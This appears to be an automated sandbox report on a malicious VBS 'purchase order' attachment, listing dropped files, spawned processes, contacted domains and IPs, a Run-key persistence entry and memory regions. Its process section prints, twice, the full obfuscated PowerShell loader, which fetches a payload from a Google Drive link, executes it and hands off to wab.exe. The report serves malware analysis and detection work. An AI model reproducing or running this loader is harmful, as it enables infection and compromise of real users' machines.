Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Purchase Order N#U00b0 20240702.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c0g025ep.ybw.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q4qj2m4c.yc1.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qzjtzp5a.znq.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t0ifmrza.kf5.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Rundtenommer.Rhy
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\ysaPFN\ysaPFN.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
modified
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order N#U00b0 20240702.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unscrambles Islndingers198 Fetichdyrkernes Stadioners
Impossible236 manhunts Counterpropagations Regnestokkene Arbejdsdelings Reactualizations maurernes fodrodsknoglerne Fjerntboendes247
Periangiocholitis103 Cykelkdernes Alisphenoid Hispidity Velplejede Noggings Mntvaskeriernes uskadeliggjort Isoptic Aminoketone
housemaidenly Unscrambles Islndingers198 Fetichdyrkernes Stadioners Impossible236 manhunts Counterpropagations Regnestokkene
Arbejdsdelings Reactualizations maurernes fodrodsknoglerne Fjerntboendes247 Periangiocholitis103 Cykelkdernes Alisphenoid
Hispidity Velplejede Noggings Mntvaskeriernes uskadeliggjort Isoptic Aminoketone housemaidenly';If (${host}.CurrentCulture)
{$cyperaceous++;}Function Lecithalbumin($Transfusionskanylerne){$tysklandsrejse=$Transfusionskanylerne.Length-$cyperaceous;$Undersupplied='SUBsTRI';$Undersupplied+='ng';For(
$Elisioner=2;$Elisioner -lt $tysklandsrejse;$Elisioner+=3){$Unscrambles+=$Transfusionskanylerne.$Undersupplied.Invoke( $Elisioner,
$cyperaceous);}$Unscrambles;}function Rysters($Baksningers){ & ($Datolinjerne) ($Baksningers);}$Eftersprgslens107=Lecithalbumin
'VkMNoo oz Mi.nl Nl ea.i/ .5Fj.G.0 m E.(PhW ,i Sn.edFao SwUms F ,N,aT S Su1,u0H .Cy0in;ov A,W oiT,nL,6Tr4Va;O. OsxGa6Do4d
;Cl Cor EvSe: S1,i2Ne1Re. e0Pl)Pe .dGE eStcBak Ho ,/ V2Sa0Dy1Th0 .0Me1Om0 .1fo RoFAri rBeePifvaoadxK,/af1re2 i1.c.Ad0Se ';$Mottolike90=Lecithalbumin
'GeUL.sPheSurLu- .A .g BeS.nAptRu ';$Impossible236=Lecithalbumin ',ahCat ntHepP.s U:Ug/ C/ SdEnrPliSmv,eeIn.,ag AoDaoDjg ,lThe
A.F cEnoDimUf/SyuDacHo?,oe IxUnpEpoKarN.tFo=U dXxo MwUnnSylJooEpaG,dTh&Bui ,d h=in1,cySuz eBaOA RZilReWP dCoW .KAtE S1Gu5
eSpn,o4T vgl7Cat u0Pay.ymalp.l9Bl6 DmcrbTr-ArKBrlKrURuQ u ';$Oversocially=Lecithalbumin 'Re>Br ';$Datolinjerne=Lecithalbumin
' Gi Bea,x F ';$Biles='Regnestokkene';$ekstemporeringernes = Lecithalbumin 'MieLocBrhElo,f do%Pea,up apM d .a,ptsoaIt%,u\PoRPiuB,n.ad,ktS,e
.nCoo.fmSemHye r E.AtR Uh Dy S K& .&Mi ReRecGlhBroPe T tHo ';Rysters (Lecithalbumin '.r$e.g AlBlo mbTia AlU.: BDUni ,a
DcVao .dSyiSioB nVa1Sm2K.5 u=St(YecT.mHedPo P/.ycTe Te$,ae Sk.osKotAneUrm ip,noP r,eeSjrReiD,n agPrePsr tnS.eD.sR.)Po ');Rysters
(Lecithalbumin 'Fo$IngG,lStoT.bS.aexl.l:AlSnotSoag d .iBro RnCee lr sMo=,e$brI im.epUnoNosAfsBriHeb Pl.oeDa2Ud3 ,6Ga.Scs
Rp Dl,hiret T(L.$BeO PvC,e SrResVioHjc PiFeaE.lKll CyU.) G ');Rysters (Lecithalbumin 'M.[ eNV,eSctKa.JuS beSmrPivEsiPoc Ge
TP mo DiManRltCoMMiakonhea .g.neThrSu]Or:In:.eSFueAlc u arSti St,eyLaPRur no ntC oalcMio.olS ,r=Ke Ly[PrN Se ,t ,.SpS .e
.cDeu,tr NiSet DyRoPBir OoBitTeoCocLso ulKaTT.y op e.l],o:Fo:SyTSkls,sb 1Tj2H ');$Impossible236=$Stadioners[0];$Cottonopolis=
(Lecithalbumin 'In$lig.dlL.o LbOraJal L:PrU,nt ,y,opKoi s.rkP,eTisP.=flN.geFiw ,-OuOD bn j,neDicw.t a M,S RyDrsRet,eeP.m
..LiNYneRatS,.L,W,aeRobFoCF lRei ,eSlnC,t');$Cottonopolis+=$Diacodion125[1];Rysters ($Cottonopolis);Rysters (Lecithalbumin
'Re$InU vt SyEnpPliA,sArkBre OsLi.StH Oep.aA,dL.ener os T[Su$ ,MU oAlt,otReo .l CiI.kOre F9 ,0He] T=,n$F EU.f,ptKoeBir,asYtpTjrRugGesPhlMoeCan,esLs1Fo0Ha7r.
');$Naiades=Lecithalbumin 'Re$ SUl.tO,yOvp ,iNosS kuseHesOx.ZwDYdofowRon kl,aoAaaPedPrFReiFalDreS.(ye$F I Pm ipP oS s .s Ti
Bb KlH.eCh2Sk3 i6 ,,Ny$,iIudsAtoGopUntGaiBlcSm) E ';$Isoptic=$Diacodion125[0];Rysters (Lecithalbumin ' D$b,g.ulCao qbreaN
lPa: ,f Do rrG.sC.tE u RmPrmOpeU dSre Ds,t=On(TuT Pe ,sD t F-PhPThaKot hc Pr$ ,I s coBipS,tUniPtcat)N ');while (!$forstummedes)
{Rysters (Lecithalbumin 'Ou$Spg Fl,toKibTaaIgl.r:P A ,m Fo,or,at OiTrsN a PtFoi lo HnE,eSjrTssNa7A 8un=Fo$TitRar PuAne D ')
;Rysters $Naiades;Rysters (Lecithalbumin 'BaS,etMea PrIntB.-i.SSvl KeCheO,p.a A4U, ');Rysters (Lecithalbumin 'St$Geg.ylScoSyb
,aP,lYp:.nf .o ,rB.sLit,nu.emEsmLae,adAbe TsPr=.e( MTS,e,as Lt a-MoPReaGrt AhIn Ed$DaIAgs,uoUdpUvtA,iDecSy) V ') ;Rysters
(Lecithalbumin 'A,$ RgFal Ho Ob aP.lHo:CoFB,e.at,lipocI.hEldMyyForNdkToeF,r an.aeChsMi=Te$sng GlEuoErbOra nl S:PrIResDelSynafdReiV.nCog
PeBarovsLa1Ko9e.8N.+ U+S,%Fo$PrS RtU.alud BiL,oWanS eJorSksUn.trcStoGeuFon ntS ') ;$Impossible236=$Stadioners[$Fetichdyrkernes];}$Trellised=287214;$Christianias26=27464;Rysters
(Lecithalbumin 'Ve$trg el ,os,b AaG l T:OvASur b PeHajAud BsSkdOme lTai knAlgEls , Be=L AGa,eK,t,k-o,CHeo snFitsoeBanTot
J Un$GrIInsK.oSupSat ii cMe ');Rysters (Lecithalbumin 'Tr$Klgm,lSeoK b,uaDel R:GlI EnTodSus ok.krCeiFaf utAceorrAfn,ae .sU,
T.= B Un[,oSDiyEnsRetIneUlm . ,CO.oEpn Gv Te .r ,tPo]S :Se:UnFGrrMaoOtmEkB MaM,sFieU.6Do4AsSCotExrS i Dn,egTj( .$ DANarUnbDyeHnjVod
Ps AdLee lS iBon .gMasMe)s. ');Rysters (Lecithalbumin 'vu$IngO.l oKob FaFolSt:D,f Bo Fd UrDioAndU s .kUnnUnoIngR lF eCorGenl
eKi B.=B. Pa[AfS,rySts FtLne ,mKb.EnTGre,cxb,tPr. Er nThcE oSud AiYanIngDe]Po:Sp:MaAStSSkC .IM Iuf.E,GF eMutSuSDitp rdeiUdnT.gS,(
.$RiIUsn.nd RsJek nrAriJefCotKoeTyr OnT e CsD )Co ');Rysters (Lecithalbumin 'Di$ ogchl Po.db aPal,o:.mHS,aVai,ir IbE,aE,nV
d .sP.=Tr$ .fS,oJadSkr SoImd sDrkAmn Ho fgFolAneSnrG,n reCe.U.s ,uS.bHosNotCorOvi FnGegSu( S$GoTK.r ieKal,al .iHysToe.vdDi,K,$HeC
Eh .r aiDes rtUkiDoaSyn HiAra,gsna2P.6Un)N, ');Rysters $Hairbands;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unscrambles Islndingers198 Fetichdyrkernes Stadioners
Impossible236 manhunts Counterpropagations Regnestokkene Arbejdsdelings Reactualizations maurernes fodrodsknoglerne Fjerntboendes247
Periangiocholitis103 Cykelkdernes Alisphenoid Hispidity Velplejede Noggings Mntvaskeriernes uskadeliggjort Isoptic Aminoketone
housemaidenly Unscrambles Islndingers198 Fetichdyrkernes Stadioners Impossible236 manhunts Counterpropagations Regnestokkene
Arbejdsdelings Reactualizations maurernes fodrodsknoglerne Fjerntboendes247 Periangiocholitis103 Cykelkdernes Alisphenoid
Hispidity Velplejede Noggings Mntvaskeriernes uskadeliggjort Isoptic Aminoketone housemaidenly';If (${host}.CurrentCulture)
{$cyperaceous++;}Function Lecithalbumin($Transfusionskanylerne){$tysklandsrejse=$Transfusionskanylerne.Length-$cyperaceous;$Undersupplied='SUBsTRI';$Undersupplied+='ng';For(
$Elisioner=2;$Elisioner -lt $tysklandsrejse;$Elisioner+=3){$Unscrambles+=$Transfusionskanylerne.$Undersupplied.Invoke( $Elisioner,
$cyperaceous);}$Unscrambles;}function Rysters($Baksningers){ & ($Datolinjerne) ($Baksningers);}$Eftersprgslens107=Lecithalbumin
'VkMNoo oz Mi.nl Nl ea.i/ .5Fj.G.0 m E.(PhW ,i Sn.edFao SwUms F ,N,aT S Su1,u0H .Cy0in;ov A,W oiT,nL,6Tr4Va;O. OsxGa6Do4d
;Cl Cor EvSe: S1,i2Ne1Re. e0Pl)Pe .dGE eStcBak Ho ,/ V2Sa0Dy1Th0 .0Me1Om0 .1fo RoFAri rBeePifvaoadxK,/af1re2 i1.c.Ad0Se ';$Mottolike90=Lecithalbumin
'GeUL.sPheSurLu- .A .g BeS.nAptRu ';$Impossible236=Lecithalbumin ',ahCat ntHepP.s U:Ug/ C/ SdEnrPliSmv,eeIn.,ag AoDaoDjg ,lThe
A.F cEnoDimUf/SyuDacHo?,oe IxUnpEpoKarN.tFo=U dXxo MwUnnSylJooEpaG,dTh&Bui ,d h=in1,cySuz eBaOA RZilReWP dCoW .KAtE S1Gu5
eSpn,o4T vgl7Cat u0Pay.ymalp.l9Bl6 DmcrbTr-ArKBrlKrURuQ u ';$Oversocially=Lecithalbumin 'Re>Br ';$Datolinjerne=Lecithalbumin
' Gi Bea,x F ';$Biles='Regnestokkene';$ekstemporeringernes = Lecithalbumin 'MieLocBrhElo,f do%Pea,up apM d .a,ptsoaIt%,u\PoRPiuB,n.ad,ktS,e
.nCoo.fmSemHye r E.AtR Uh Dy S K& .&Mi ReRecGlhBroPe T tHo ';Rysters (Lecithalbumin '.r$e.g AlBlo mbTia AlU.: BDUni ,a
DcVao .dSyiSioB nVa1Sm2K.5 u=St(YecT.mHedPo P/.ycTe Te$,ae Sk.osKotAneUrm ip,noP r,eeSjrReiD,n agPrePsr tnS.eD.sR.)Po ');Rysters
(Lecithalbumin 'Fo$IngG,lStoT.bS.aexl.l:AlSnotSoag d .iBro RnCee lr sMo=,e$brI im.epUnoNosAfsBriHeb Pl.oeDa2Ud3 ,6Ga.Scs
Rp Dl,hiret T(L.$BeO PvC,e SrResVioHjc PiFeaE.lKll CyU.) G ');Rysters (Lecithalbumin 'M.[ eNV,eSctKa.JuS beSmrPivEsiPoc Ge
TP mo DiManRltCoMMiakonhea .g.neThrSu]Or:In:.eSFueAlc u arSti St,eyLaPRur no ntC oalcMio.olS ,r=Ke Ly[PrN Se ,t ,.SpS .e
.cDeu,tr NiSet DyRoPBir OoBitTeoCocLso ulKaTT.y op e.l],o:Fo:SyTSkls,sb 1Tj2H ');$Impossible236=$Stadioners[0];$Cottonopolis=
(Lecithalbumin 'In$lig.dlL.o LbOraJal L:PrU,nt ,y,opKoi s.rkP,eTisP.=flN.geFiw ,-OuOD bn j,neDicw.t a M,S RyDrsRet,eeP.m
..LiNYneRatS,.L,W,aeRobFoCF lRei ,eSlnC,t');$Cottonopolis+=$Diacodion125[1];Rysters ($Cottonopolis);Rysters (Lecithalbumin
'Re$InU vt SyEnpPliA,sArkBre OsLi.StH Oep.aA,dL.ener os T[Su$ ,MU oAlt,otReo .l CiI.kOre F9 ,0He] T=,n$F EU.f,ptKoeBir,asYtpTjrRugGesPhlMoeCan,esLs1Fo0Ha7r.
');$Naiades=Lecithalbumin 'Re$ SUl.tO,yOvp ,iNosS kuseHesOx.ZwDYdofowRon kl,aoAaaPedPrFReiFalDreS.(ye$F I Pm ipP oS s .s Ti
Bb KlH.eCh2Sk3 i6 ,,Ny$,iIudsAtoGopUntGaiBlcSm) E ';$Isoptic=$Diacodion125[0];Rysters (Lecithalbumin ' D$b,g.ulCao qbreaN
lPa: ,f Do rrG.sC.tE u RmPrmOpeU dSre Ds,t=On(TuT Pe ,sD t F-PhPThaKot hc Pr$ ,I s coBipS,tUniPtcat)N ');while (!$forstummedes)
{Rysters (Lecithalbumin 'Ou$Spg Fl,toKibTaaIgl.r:P A ,m Fo,or,at OiTrsN a PtFoi lo HnE,eSjrTssNa7A 8un=Fo$TitRar PuAne D ')
;Rysters $Naiades;Rysters (Lecithalbumin 'BaS,etMea PrIntB.-i.SSvl KeCheO,p.a A4U, ');Rysters (Lecithalbumin 'St$Geg.ylScoSyb
,aP,lYp:.nf .o ,rB.sLit,nu.emEsmLae,adAbe TsPr=.e( MTS,e,as Lt a-MoPReaGrt AhIn Ed$DaIAgs,uoUdpUvtA,iDecSy) V ') ;Rysters
(Lecithalbumin 'A,$ RgFal Ho Ob aP.lHo:CoFB,e.at,lipocI.hEldMyyForNdkToeF,r an.aeChsMi=Te$sng GlEuoErbOra nl S:PrIResDelSynafdReiV.nCog
PeBarovsLa1Ko9e.8N.+ U+S,%Fo$PrS RtU.alud BiL,oWanS eJorSksUn.trcStoGeuFon ntS ') ;$Impossible236=$Stadioners[$Fetichdyrkernes];}$Trellised=287214;$Christianias26=27464;Rysters
(Lecithalbumin 'Ve$trg el ,os,b AaG l T:OvASur b PeHajAud BsSkdOme lTai knAlgEls , Be=L AGa,eK,t,k-o,CHeo snFitsoeBanTot
J Un$GrIInsK.oSupSat ii cMe ');Rysters (Lecithalbumin 'Tr$Klgm,lSeoK b,uaDel R:GlI EnTodSus ok.krCeiFaf utAceorrAfn,ae .sU,
T.= B Un[,oSDiyEnsRetIneUlm . ,CO.oEpn Gv Te .r ,tPo]S :Se:UnFGrrMaoOtmEkB MaM,sFieU.6Do4AsSCotExrS i Dn,egTj( .$ DANarUnbDyeHnjVod
Ps AdLee lS iBon .gMasMe)s. ');Rysters (Lecithalbumin 'vu$IngO.l oKob FaFolSt:D,f Bo Fd UrDioAndU s .kUnnUnoIngR lF eCorGenl
eKi B.=B. Pa[AfS,rySts FtLne ,mKb.EnTGre,cxb,tPr. Er nThcE oSud AiYanIngDe]Po:Sp:MaAStSSkC .IM Iuf.E,GF eMutSuSDitp rdeiUdnT.gS,(
.$RiIUsn.nd RsJek nrAriJefCotKoeTyr OnT e CsD )Co ');Rysters (Lecithalbumin 'Di$ ogchl Po.db aPal,o:.mHS,aVai,ir IbE,aE,nV
d .sP.=Tr$ .fS,oJadSkr SoImd sDrkAmn Ho fgFolAneSnrG,n reCe.U.s ,uS.bHosNotCorOvi FnGegSu( S$GoTK.r ieKal,al .iHysToe.vdDi,K,$HeC
Eh .r aiDes rtUkiDoaSyn HiAra,gsna2P.6Un)N, ');Rysters $Hairbands;"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Rundtenommer.Rhy && echo t"
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Rundtenommer.Rhy && echo t"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://drive.usercontent.google.com
|
unknown
|
||
|
https://drive.goog
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://crl.microsoft
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://drive.google.com/uc?ex
|
unknown
|
||
|
https://drive.google.com/u
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://drive.google.co0
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://drive.googP
|
unknown
|
||
|
https://drive.usercontent.googh
|
unknown
|
||
|
https://drive.usercontent.google.com/
|
unknown
|
||
|
http://drive.google.com
|
unknown
|
||
|
https://drive.google.
|
unknown
|
||
|
https://drive.go
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://r3.i.lencr.org/0
|
unknown
|
||
|
https://drive.goo
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://drive.g
|
unknown
|
||
|
https://drive.google.com/uc
|
unknown
|
||
|
https://drive.google.com/X
|
unknown
|
||
|
http://x1.c.lencr
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://drive.google.com/
|
unknown
|
||
|
http://x1.c.lencr.org/0
|
unknown
|
||
|
http://x1.i.lencr.org/0
|
unknown
|
||
|
https://drive.googl
|
unknown
|
||
|
https://drive.google.com/uc?e
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://ip-api.com
|
unknown
|
||
|
http://r3.o.lencr.org0
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
https://drive.google.c
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
https://drive.google.com/uc?
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://drive.usercontent.google.com/3
|
unknown
|
||
|
http://ysmglobalsourcing.com
|
unknown
|
||
|
https://drive.google
|
unknown
|
||
|
http://ip-api.com/line/?fields=hosting
|
208.95.112.1
|
There are 37 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
ip-api.com
|
208.95.112.1
|
|
|
|
bg.microsoft.map.fastly.net
|
199.232.210.172
|
||
|
drive.google.com
|
142.250.185.206
|
||
|
drive.usercontent.google.com
|
142.250.185.161
|
||
|
ysmglobalsourcing.com
|
107.181.234.46
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
208.95.112.1
|
ip-api.com
|
United States
|
|
|
|
142.250.185.206
|
drive.google.com
|
United States
|
||
|
142.250.185.161
|
drive.usercontent.google.com
|
United States
|
||
|
107.181.234.46
|
ysmglobalsourcing.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
ysaPFN
|
There are 20 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
228A5000
|
trusted library allocation
|
page read and write
|
|
|
|
5999000
|
trusted library allocation
|
page read and write
|
|
|
|
8450000
|
direct allocation
|
page execute and read and write
|
|
|
|
96C9000
|
direct allocation
|
page execute and read and write
|
|
|
|
228D2000
|
trusted library allocation
|
page read and write
|
|
|
|
262DBFD9000
|
trusted library allocation
|
page read and write
|
|
|
|
262CDDAB000
|
trusted library allocation
|
page read and write
|
||
|
6FA4000
|
heap
|
page read and write
|
||
|
262E4741000
|
heap
|
page read and write
|
||
|
24B34000
|
heap
|
page read and write
|
||
|
24FA0000
|
trusted library allocation
|
page read and write
|
||
|
1CB08418000
|
heap
|
page read and write
|
||
|
24B43000
|
heap
|
page read and write
|
||
|
1CB08443000
|
heap
|
page read and write
|
||
|
22310000
|
heap
|
page read and write
|
||
|
1CB08308000
|
heap
|
page read and write
|
||
|
7040000
|
direct allocation
|
page read and write
|
||
|
228D0000
|
trusted library allocation
|
page read and write
|
||
|
6F31000
|
heap
|
page read and write
|
||
|
707C000
|
heap
|
page read and write
|
||
|
1CB08511000
|
heap
|
page read and write
|
||
|
262CDD6E000
|
trusted library allocation
|
page read and write
|
||
|
228F1000
|
trusted library allocation
|
page read and write
|
||
|
6EE0000
|
direct allocation
|
page read and write
|
||
|
24F90000
|
trusted library allocation
|
page read and write
|
||
|
262CC434000
|
trusted library allocation
|
page read and write
|
||
|
71F0000
|
trusted library allocation
|
page read and write
|
||
|
72BE000
|
stack
|
page read and write
|
||
|
7DB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
24F80000
|
trusted library allocation
|
page read and write
|
||
|
24F70000
|
trusted library allocation
|
page read and write
|
||
|
24F81000
|
trusted library allocation
|
page read and write
|
||
|
24F80000
|
trusted library allocation
|
page read and write
|
||
|
256C0000
|
trusted library allocation
|
page read and write
|
||
|
25FE000
|
stack
|
page read and write
|
||
|
24F7D000
|
trusted library allocation
|
page read and write
|
||
|
1CB08721000
|
heap
|
page read and write
|
||
|
814D000
|
heap
|
page read and write
|
||
|
8122000
|
heap
|
page read and write
|
||
|
6FB3000
|
heap
|
page read and write
|
||
|
7FFAAC3B0000
|
trusted library allocation
|
page read and write
|
||
|
262CA440000
|
heap
|
page read and write
|
||
|
262CC49F000
|
trusted library allocation
|
page read and write
|
||
|
262CA6B0000
|
trusted library allocation
|
page read and write
|
||
|
1CB08435000
|
heap
|
page read and write
|
||
|
22871000
|
trusted library allocation
|
page read and write
|
||
|
24F80000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC2FA000
|
trusted library allocation
|
page read and write
|
||
|
24FE0000
|
trusted library allocation
|
page read and write
|
||
|
83C0000
|
trusted library allocation
|
page read and write
|
||
|
7130000
|
trusted library allocation
|
page read and write
|
||
|
1CB082E4000
|
heap
|
page read and write
|
||
|
83B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC300000
|
trusted library allocation
|
page execute and read and write
|
||
|
228F5000
|
trusted library allocation
|
page read and write
|
||
|
712B000
|
heap
|
page read and write
|
||
|
24FE0000
|
trusted library allocation
|
page read and write
|
||
|
262CA4BC000
|
heap
|
page read and write
|
||
|
1CB08412000
|
heap
|
page read and write
|
||
|
249C2000
|
trusted library allocation
|
page read and write
|
||
|
59A9000
|
remote allocation
|
page execute and read and write
|
||
|
24F90000
|
trusted library allocation
|
page read and write
|
||
|
22860000
|
heap
|
page execute and read and write
|
||
|
6EC0000
|
direct allocation
|
page read and write
|
||
|
7FFAAC480000
|
trusted library allocation
|
page read and write
|
||
|
2EED000
|
trusted library allocation
|
page execute and read and write
|
||
|
3050000
|
heap
|
page read and write
|
||
|
24FA0000
|
trusted library allocation
|
page read and write
|
||
|
300E000
|
stack
|
page read and write
|
||
|
262DBF91000
|
trusted library allocation
|
page read and write
|
||
|
6E47000
|
heap
|
page read and write
|
||
|
1FF269B0000
|
heap
|
page read and write
|
||
|
1FF26CC4000
|
heap
|
page read and write
|
||
|
262CC806000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC380000
|
trusted library allocation
|
page read and write
|
||
|
24F80000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC200000
|
trusted library allocation
|
page execute and read and write
|
||
|
24F90000
|
trusted library allocation
|
page read and write
|
||
|
318F000
|
unkown
|
page read and write
|
||
|
7FFAAC3E0000
|
trusted library allocation
|
page read and write
|
||
|
262CA500000
|
heap
|
page read and write
|
||
|
1CB088D7000
|
heap
|
page read and write
|
||
|
262CBF60000
|
heap
|
page read and write
|
||
|
6FA7000
|
heap
|
page read and write
|
||
|
262CA4F3000
|
heap
|
page read and write
|
||
|
24FD0000
|
trusted library allocation
|
page read and write
|
||
|
1CB082F8000
|
heap
|
page read and write
|
||
|
7E80000
|
heap
|
page read and write
|
||
|
1CB088D7000
|
heap
|
page read and write
|
||
|
45A9000
|
remote allocation
|
page execute and read and write
|
||
|
805C000
|
stack
|
page read and write
|
||
|
24A69000
|
trusted library allocation
|
page read and write
|
